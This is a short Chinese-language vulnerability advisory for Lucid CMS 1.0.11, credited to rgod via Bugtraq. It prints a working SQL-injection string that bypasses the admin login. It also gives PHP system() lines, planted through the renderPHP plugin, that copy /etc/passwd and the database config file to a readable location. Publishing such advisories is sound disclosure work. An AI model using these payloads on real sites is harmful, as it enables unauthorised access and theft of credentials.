Lucid CMS 1.0.11 SQL注入/绕过登录/远程执行代码漏洞
发布日期:2005-09-30
更新日期:2005-09-30
受影响系统:lucidCMS Lucid CMS 1.0.11
描述:
BUGTRAQ ID:
14976
lucidCMS是一款简单灵活的内容管理系统。
lucidCMS中存在多个输入验证错误:
1) 如果关闭魔术引号的话就会导致SQL注入:
在登录表单中输入以下内容,以管理员登录:
登录:'UNION(SELECT'1','admin','admin','
FAKE@hotmail.com','d41d8cd98f00b204e9800998ecf8427e','1')/*
口令:无 ^
|
|
这是哈希
md5('')的结果
注意:登录中没有空格
登录请求变为:
SELECT * FROM lucid_users WHERE name=''UNION(SELECT'1','admin','admin','
FAKE@hotmail.com','d41d8cd98f00b204e9800998ecf8427e','1')/*'
2) 现在新的管理员就可以编辑模板、注入恶意javascript代码、查看phpinfo()、管理用户/组、激活/禁用插件。攻击者可以激活renderPHP插件,在主样式表末尾添加以下行:
<?php error_reporting(0); system('cat /etc/passwd > temp.txt'); ?>
查看/etc/passwd文件:
<?php error_reporting(0); system('cat dBConfig.php > temp.txt'); ?>
查看数据库用户名/口令、数据库名称和表格前缀,这样就可以完全控制数据库系统。
<*来源:rgod (
rgod@autistici.org)
链接:
http://marc.theaimsgroup.com/?l=bugtraq&m=112803020415743&w=2
*>
建议:
厂商补丁:
lucidCMS
--------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://lucidcms.net/浏览次数:2726
严重程度:0(网友投票)